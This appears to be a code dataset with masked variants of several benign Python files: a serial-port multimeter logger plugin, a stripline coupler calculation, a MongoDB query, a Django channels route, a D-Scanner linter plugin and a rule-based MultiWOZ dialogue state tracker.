        uic.loadUi(packagedir+"/holdPeak_VC820/portSelectWidget.ui", self.widget)
        # self.setCallbacks()
        self.widget.pushButton.clicked.connect(self.__openPortCallback)
        self.__openPortCallback()
        return self.widget

    def __openPortCallback(self):
        if self.run:
            self.cancel()
            self.widget.pushButton.setText("Verbinden")
        else:
            port = self.widget.comboBox.currentText()
            if self.__openPort(port):
                self.start()
                self.widget.pushButton.setText("Beenden")
            else:
                self.cancel()
                self.widget.pushButton.setText("Fehler")

    def _get_data(self):
        test = self._serial_port.read(1)
        if len(test) != 1:
            logging.error("recieved incomplete data, skipping...", file=sys.stderr)
            return False, None, None
        if MultimeterMessage.check_first_byte(test[0]):
            data = test + self._serial_port.read(MultimeterMessage.MESSAGE_LENGTH-1)
        else:
            logging.error("received incorrect data (%s), skipping..." % test.hex(), file=sys.stderr)
            return False, None, None
        if len(data) != MultimeterMessage.MESSAGE_LENGTH:
            logging.error("received incomplete message (%s), skipping..." %
                          data.hex(), file=sys.stderr)
            return False, None, None
        try:
            message = MultimeterMessage(data)
            #message.value = message.get_base_reading()
        except ValueError as e:
            logging.debug(e)
            logging.error("Error decoding: %s on message %s" % (str(e), data.hex()))
            return False, None, None
        # logging.debug(str(message))
        # return True, message.value, message.unit
        return True, round(message.value*message.multiplier, 10), message.base_unit


if __name__ == "__main__":
    standalone = Plugin()
    standalone.setup()
normal
{ "blob_id": "c3efaeab600ec9a7a9fffdfad5c9dc1faad8fee7", "index": 726, "step-1": "<mask token>\n\n\nclass Plugin(LoggerPlugin):\n <mask token>\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n 
self.widget.pushButton.setText('Verbinden')\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText('Beenden')\n else:\n self.cancel()\n self.widget.pushButton.setText('Fehler')\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error('recieved incomplete data, skipping...', file=sys\n .stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.\n MESSAGE_LENGTH - 1)\n else:\n logging.error('received incorrect data (%s), skipping...' %\n test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error('received incomplete message (%s), skipping...' %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n except ValueError as e:\n logging.debug(e)\n logging.error('Error decoding: %s on message %s' % (str(e),\n data.hex()))\n return False, None, None\n return True, round(message.value * message.multiplier, 10\n ), message.base_unit\n\n\n<mask token>\n", "step-3": "try:\n from LoggerPlugin import LoggerPlugin\nexcept ImportError:\n from RTOC.LoggerPlugin import LoggerPlugin\n<mask token>\nlog.basicConfig(level=log.INFO)\nlogging = log.getLogger(__name__)\ndevicename = 'HoldPeak'\ndefault_device = 'COM7'\nSERIAL_BAUDRATE = 2400\nSERIAL_BYTESIZE = 8\nSERIAL_TIMEOUT = 1\nSAMPLERATE = 1\n\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText('Verbinden')\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText('Beenden')\n else:\n self.cancel()\n self.widget.pushButton.setText('Fehler')\n\n def _get_data(self):\n test = 
self._serial_port.read(1)\n if len(test) != 1:\n logging.error('recieved incomplete data, skipping...', file=sys\n .stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.\n MESSAGE_LENGTH - 1)\n else:\n logging.error('received incorrect data (%s), skipping...' %\n test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error('received incomplete message (%s), skipping...' %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n except ValueError as e:\n logging.debug(e)\n logging.error('Error decoding: %s on message %s' % (str(e),\n data.hex()))\n return False, None, None\n return True, round(message.value * message.multiplier, 10\n ), message.base_unit\n\n\nif __name__ == '__main__':\n standalone = Plugin()\n standalone.setup()\n", "step-4": "try:\n from LoggerPlugin import LoggerPlugin\nexcept ImportError:\n from RTOC.LoggerPlugin import LoggerPlugin\nfrom .holdPeak_VC820.vc820py.vc820 import MultimeterMessage\nimport serial\nimport sys\nimport traceback\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\nimport logging as log\nlog.basicConfig(level=log.INFO)\nlogging = log.getLogger(__name__)\ndevicename = 'HoldPeak'\ndefault_device = 'COM7'\nSERIAL_BAUDRATE = 2400\nSERIAL_BYTESIZE = 8\nSERIAL_TIMEOUT = 1\nSAMPLERATE = 1\n\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText('Verbinden')\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText('Beenden')\n else:\n self.cancel()\n self.widget.pushButton.setText('Fehler')\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error('recieved 
incomplete data, skipping...', file=sys\n .stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.\n MESSAGE_LENGTH - 1)\n else:\n logging.error('received incorrect data (%s), skipping...' %\n test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error('received incomplete message (%s), skipping...' %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n except ValueError as e:\n logging.debug(e)\n logging.error('Error decoding: %s on message %s' % (str(e),\n data.hex()))\n return False, None, None\n return True, round(message.value * message.multiplier, 10\n ), message.base_unit\n\n\nif __name__ == '__main__':\n standalone = Plugin()\n standalone.setup()\n", "step-5": "try:\n from LoggerPlugin import LoggerPlugin\nexcept ImportError:\n from RTOC.LoggerPlugin import LoggerPlugin\n\nfrom .holdPeak_VC820.vc820py.vc820 import MultimeterMessage\nimport serial\nimport sys\nimport traceback\n\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\nimport logging as log\nlog.basicConfig(level=log.INFO)\nlogging = log.getLogger(__name__)\n\ndevicename = \"HoldPeak\"\ndefault_device = 'COM7'\nSERIAL_BAUDRATE = 2400\nSERIAL_BYTESIZE = 8\nSERIAL_TIMEOUT = 1\nSAMPLERATE = 1\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Plugin setup\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n\n self._last_value = 0\n self._jump_allowed = True\n # Data-logger thread\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n # self.updater.start()\n\n def __openPort(self, portname=default_device):\n # Communication setup\n #self.portname = \"/dev/ttyUSB0\"\n #self.portname = \"COM7\"\n self.portname = portname\n #################################################################################\n # os.system(\"sudo chmod a+rw /dev/ttyUSB0\")\n # #######\n # uncomment this line if you do not set device rules:\n # > sudo nano /etc/udev/rules.d/50-myusb.rules\n # > * SUBSYSTEMS==\"usb\", ATTRS{idVendor}==\"067b\", ATTRS{idProduct}==\"2303\", GROUP=\"users\", MODE=\"0666\"\n # > [Strg+O, Strg+X]\n # > sudo udevadm control --reload\n # Ref: http://ask.xmodulo.com/change-usb-device-permission-linux.html\n #################################################################################\n try:\n self._serial_port = serial.Serial(\n self.portname, baudrate=SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE, timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n # dtr and rts settings required for adapter\n self._serial_port.dtr = True\n self._serial_port.rts = False\n # -------------\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n # THIS IS YOUR THREAD\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == \"V\":\n datanames = [\"Spannung\"]\n elif unit == \"A\":\n datanames = [\"Strom\"]\n elif unit == \"Ohm\":\n datanames = [\"Widerstand\"]\n elif unit == \"°C\":\n datanames = [\"Temperatur\"]\n elif unit == \"F\":\n datanames = [\"Kapazität\"]\n elif unit == \"Hz\":\n datanames = [\"Frequenz\"]\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value-value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n 
self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir+\"/holdPeak_VC820/portSelectWidget.ui\", self.widget)\n # self.setCallbacks()\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText(\"Verbinden\")\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText(\"Beenden\")\n else:\n self.cancel()\n self.widget.pushButton.setText(\"Fehler\")\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error(\"recieved incomplete data, skipping...\", file=sys.stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.MESSAGE_LENGTH-1)\n else:\n logging.error(\"received incorrect data (%s), skipping...\" % test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error(\"received incomplete message (%s), skipping...\" %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n #message.value = message.get_base_reading()\n except ValueError as e:\n logging.debug(e)\n logging.error(\"Error decoding: %s on message %s\" % (str(e), data.hex()))\n return False, None, None\n # logging.debug(str(message))\n # return True, message.value, message.unit\n return True, round(message.value*message.multiplier, 10), message.base_unit\n\n\nif __name__ == \"__main__\":\n standalone = Plugin()\n standalone.setup()\n", "step-ids": [ 5, 8, 10, 11, 12 ] }
[ 5, 8, 10, 11, 12 ]
import scipy.constants as const
import scipy.optimize as opt
import numpy as np
import pum.algorithms as alg
from pum.lines import *
from pum.net import *

mu = 1
eps = 2.56
b = 2.8 * const.milli
C = 13.0
Z0 = 50
f0 = 1.34 * const.giga

k = 10 ** ( - np.abs(C) / 20)
print 'k = {}' .format( k)
Z0e = Z0 * np.sqrt( ( 1 + k) / ( 1 - k))
Z0o = Z0 * np.sqrt( ( 1 - k) / ( 1 + k))
print '(Z0e, Z0o) = {}; {}' .format( Z0e, Z0o)


modke = Z0e / ( 29.976 * const.pi * np.sqrt( mu / eps))
qe = np.exp( - const.pi * modke)
ke = np.sqrt( qe) * ( ( alg.n_fun( qe) / alg.d_fun( qe)) ** 2)
modko = Z0o / ( 29.976 * const.pi * np.sqrt( mu / eps))
qo = np.exp( - const.pi * modko)
ko = np.sqrt( qo) * ( ( alg.n_fun( qo) / alg.d_fun( qo)) ** 2)

w = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke * ko))
s = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke / ko)) - w

lamb = const.c / ( np.sqrt(eps) * f0)
print 'lambda = {}; lambda/4 = {}' .format( lamb, lamb / 4)
print 'w = {} mm; s = {} mm' .format( w / const.milli, s / const.milli)
print '(Z0e, Z0o) = {}' .format( stripline_coupled( w, s, b, 0, mu, eps))
normal
{ "blob_id": "f81e4c9a502855dca31c6c991a08a12af1c2e2a6", "index": 7745, "step-1": "import scipy.constants as const\nimport scipy.optimize as opt\nimport numpy as np\nimport pum.algorithms as alg\nfrom pum.lines import *\nfrom pum.net import *\n\nmu = 1\neps = 2.56\nb = 2.8 * const.milli \nC = 13.0\nZ0 = 50\nf0 = 1.34 * const.giga\n\nk = 10 ** ( - np.abs(C) / 20)\nprint 'k = {}' .format( k)\nZ0e = Z0 * np.sqrt( ( 1 + k) / ( 1 - k))\nZ0o = Z0 * np.sqrt( ( 1 - k) / ( 1 + k))\nprint '(Z0e, Z0o) = {}; {}' .format( Z0e, Z0o)\n\n\nmodke = Z0e / ( 29.976 * const.pi * np.sqrt( mu / eps))\nqe = np.exp( - const.pi * modke)\nke = np.sqrt( qe) * ( ( alg.n_fun( qe) / alg.d_fun( qe)) ** 2)\nmodko = Z0o / ( 29.976 * const.pi * np.sqrt( mu / eps))\nqo = np.exp( - const.pi * modko)\nko = np.sqrt( qo) * ( ( alg.n_fun( qo) / alg.d_fun( qo)) ** 2)\n\nw = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke * ko))\ns = ( 2 * b / const.pi) * np.arctanh( np.sqrt( ke / ko)) - w\n\nlamb = const.c / ( np.sqrt(eps) * f0)\nprint 'lambda = {}; lambda/4 = {}' .format( lamb, lamb / 4)\nprint 'w = {} mm; s = {} mm' .format( w / const.milli, s / const.milli)\nprint '(Z0e, Z0o) = {}' .format( stripline_coupled( w, s, b, 0, mu, eps))\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
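The first few lines of the stripline script above can be sanity-checked in isolation. The snippet below only restates the formulas already present in that script (coupling factor from the dB spec, even/odd-mode impedances); it drops the pum dependency and uses the script's own input values, so the printed numbers are what the original prints should roughly report:

import math

C, Z0 = 13.0, 50.0
k = 10 ** (-abs(C) / 20)                 # coupling factor from the coupling spec in dB
Z0e = Z0 * math.sqrt((1 + k) / (1 - k))  # even-mode impedance
Z0o = Z0 * math.sqrt((1 - k) / (1 + k))  # odd-mode impedance
print(k, Z0e, Z0o)                       # roughly 0.224, 62.8, 39.8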
from django.test import TestCase

# Create your tests here.
import pymongo

client = pymongo.MongoClient(host='127.0.0.1', port=27017)
db = client.NBA_china_spider
collection = db.data

data = [title for title in collection.find()]
print(data[0]['url'])
normal
{ "blob_id": "52ebe80e2d520bf07b21dc668223348002eb6d42", "index": 2790, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(data[0]['url'])\n", "step-3": "<mask token>\nclient = pymongo.MongoClient(host='127.0.0.1', port=27017)\ndb = client.NBA_china_spider\ncollection = db.data\ndata = [title for title in collection.find()]\nprint(data[0]['url'])\n", "step-4": "from django.test import TestCase\nimport pymongo\nclient = pymongo.MongoClient(host='127.0.0.1', port=27017)\ndb = client.NBA_china_spider\ncollection = db.data\ndata = [title for title in collection.find()]\nprint(data[0]['url'])\n", "step-5": "from django.test import TestCase\n\n# Create your tests here.\nimport pymongo\n\nclient = pymongo.MongoClient(host='127.0.0.1', port=27017)\ndb = client.NBA_china_spider\ncollection = db.data\n\ndata = [title for title in collection.find()]\nprint(data[0]['url'])\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from channels.routing import route
from .consumers import message_consumer

channel_routing = [
    route("slack.rtm.message", message_consumer)
]
normal
{ "blob_id": "8439972b4458ba66d98f6a80a82a35576df472a4", "index": 8096, "step-1": "<mask token>\n", "step-2": "<mask token>\nchannel_routing = [route('slack.rtm.message', message_consumer)]\n", "step-3": "from channels.routing import route\nfrom .consumers import message_consumer\nchannel_routing = [route('slack.rtm.message', message_consumer)]\n", "step-4": "from channels.routing import route\nfrom .consumers import message_consumer\n\nchannel_routing = [\n route(\"slack.rtm.message\", message_consumer)\n]", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#
# linter.py
# Linter for SublimeLinter version 4.
#
# Written by Brian Schott (Hackerpilot)
# Copyright © 2014-2019 Economic Modeling Specialists, Intl.
#
# License: MIT
#

"""This module exports the D-Scanner plugin class."""

from SublimeLinter.lint import Linter, STREAM_STDOUT


class Dscanner(Linter):

    """Provides an interface to dscanner."""

    cmd = ("dscanner", "-S", "${file}")
    regex = r'^.+?\((?P<line>\d+):(?P<col>\d+)\)\[((?P<warning>warn)|(?P<error>error))\]: (?P<message>.+)$'
    multiline = False
    tempfile_suffix = "-"
    word_re = None
    defaults = {
        "selector": "source.d"
    }
    name = "D-Scanner"
normal
{ "blob_id": "fda73b5dac038f077da460d6ebfb432b756909d9", "index": 3125, "step-1": "<mask token>\n\n\nclass Dscanner(Linter):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Dscanner(Linter):\n <mask token>\n cmd = 'dscanner', '-S', '${file}'\n regex = (\n '^.+?\\\\((?P<line>\\\\d+):(?P<col>\\\\d+)\\\\)\\\\[((?P<warning>warn)|(?P<error>error))\\\\]: (?P<message>.+)$'\n )\n multiline = False\n tempfile_suffix = '-'\n word_re = None\n defaults = {'selector': 'source.d'}\n name = 'D-Scanner'\n", "step-3": "<mask token>\n\n\nclass Dscanner(Linter):\n \"\"\"Provides an interface to dscanner.\"\"\"\n cmd = 'dscanner', '-S', '${file}'\n regex = (\n '^.+?\\\\((?P<line>\\\\d+):(?P<col>\\\\d+)\\\\)\\\\[((?P<warning>warn)|(?P<error>error))\\\\]: (?P<message>.+)$'\n )\n multiline = False\n tempfile_suffix = '-'\n word_re = None\n defaults = {'selector': 'source.d'}\n name = 'D-Scanner'\n", "step-4": "<mask token>\nfrom SublimeLinter.lint import Linter, STREAM_STDOUT\n\n\nclass Dscanner(Linter):\n \"\"\"Provides an interface to dscanner.\"\"\"\n cmd = 'dscanner', '-S', '${file}'\n regex = (\n '^.+?\\\\((?P<line>\\\\d+):(?P<col>\\\\d+)\\\\)\\\\[((?P<warning>warn)|(?P<error>error))\\\\]: (?P<message>.+)$'\n )\n multiline = False\n tempfile_suffix = '-'\n word_re = None\n defaults = {'selector': 'source.d'}\n name = 'D-Scanner'\n", "step-5": "#\n# linter.py\n# Linter for SublimeLinter version 4.\n#\n# Written by Brian Schott (Hackerpilot)\n# Copyright © 2014-2019 Economic Modeling Specialists, Intl.\n#\n# License: MIT\n#\n\n\"\"\"This module exports the D-Scanner plugin class.\"\"\"\n\nfrom SublimeLinter.lint import Linter, STREAM_STDOUT\n\n\nclass Dscanner(Linter):\n\n \"\"\"Provides an interface to dscanner.\"\"\"\n\n cmd = (\"dscanner\", \"-S\", \"${file}\")\n regex = r'^.+?\\((?P<line>\\d+):(?P<col>\\d+)\\)\\[((?P<warning>warn)|(?P<error>error))\\]: (?P<message>.+)$'\n multiline = False\n tempfile_suffix = \"-\"\n word_re = None\n defaults = {\n \"selector\": \"source.d\"\n }\n name = \"D-Scanner\"\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
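The `regex` attribute in the linter above does the actual parsing of dscanner's output. The following self-contained check exercises its capture groups; the sample line is made up to fit that pattern (it is inferred from the regex itself, not taken from dscanner's documentation):

import re

pattern = re.compile(
    r'^.+?\((?P<line>\d+):(?P<col>\d+)\)'
    r'\[((?P<warning>warn)|(?P<error>error))\]: (?P<message>.+)$'
)

# Hypothetical dscanner-style diagnostic line: path(line:col)[warn|error]: message
sample = "source/app.d(12:5)[warn]: Variable x is never used."
match = pattern.match(sample)
if match:
    # prints: 12 5 warn Variable x is never used.
    print(match.group('line'), match.group('col'),
          match.group('warning') or match.group('error'),
          match.group('message'))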
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.

import copy
import json
import os

import convlab
from convlab.modules.dst.multiwoz.dst_util import init_state
from convlab.modules.dst.multiwoz.dst_util import normalize_value
from convlab.modules.dst.state_tracker import Tracker
from convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA


class RuleDST(Tracker):
    """Rule based DST which trivially updates new values from NLU result to states."""
    def __init__(self):
        Tracker.__init__(self)
        self.state = init_state()
        prefix = os.path.dirname(os.path.dirname(convlab.__file__))
        self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))

    def update(self, user_act=None):
        # print('------------------{}'.format(user_act))
        if not isinstance(user_act, dict):
            raise Exception('Expect user_act to be <class \'dict\'> type but get {}.'.format(type(user_act)))
        previous_state = self.state
        new_belief_state = copy.deepcopy(previous_state['belief_state'])
        new_request_state = copy.deepcopy(previous_state['request_state'])
        for domain_type in user_act.keys():
            domain, tpe = domain_type.lower().split('-')
            if domain in ['unk', 'general', 'booking']:
                continue
            if tpe == 'inform':
                for k, v in user_act[domain_type]:
                    k = REF_SYS_DA[domain.capitalize()].get(k, k)
                    if k is None:
                        continue
                    try:
                        assert domain in new_belief_state
                    except:
                        raise Exception('Error: domain <{}> not in new belief state'.format(domain))
                    domain_dic = new_belief_state[domain]
                    assert 'semi' in domain_dic
                    assert 'book' in domain_dic

                    if k in domain_dic['semi']:
                        nvalue = normalize_value(self.value_dict, domain, k, v)
                        # if nvalue != v:
                        #     _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))
                        new_belief_state[domain]['semi'][k] = nvalue
                    elif k in domain_dic['book']:
                        new_belief_state[domain]['book'][k] = v
                    elif k.lower() in domain_dic['book']:
                        new_belief_state[domain]['book'][k.lower()] = v
                    elif k == 'trainID' and domain == 'train':
                        new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)
                    else:
                        # raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))
                        with open('unknown_slot.log', 'a+') as f:
                            f.write('unknown slot name <{}> of domain <{}>\n'.format(k, domain))
            elif tpe == 'request':
                for k, v in user_act[domain_type]:
                    k = REF_SYS_DA[domain.capitalize()].get(k, k)
                    if domain not in new_request_state:
                        new_request_state[domain] = {}
                    if k not in new_request_state[domain]:
                        new_request_state[domain][k] = 0

        new_state = copy.deepcopy(previous_state)
        new_state['belief_state'] = new_belief_state
        new_state['request_state'] = new_request_state
        new_state['user_action'] = user_act

        self.state = new_state

        return self.state

    def init_session(self):
        self.state = init_state()
normal
{ "blob_id": "8de82d09c8a9a1c1db59b0cac9cf8dda04f35847", "index": 3335, "step-1": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = 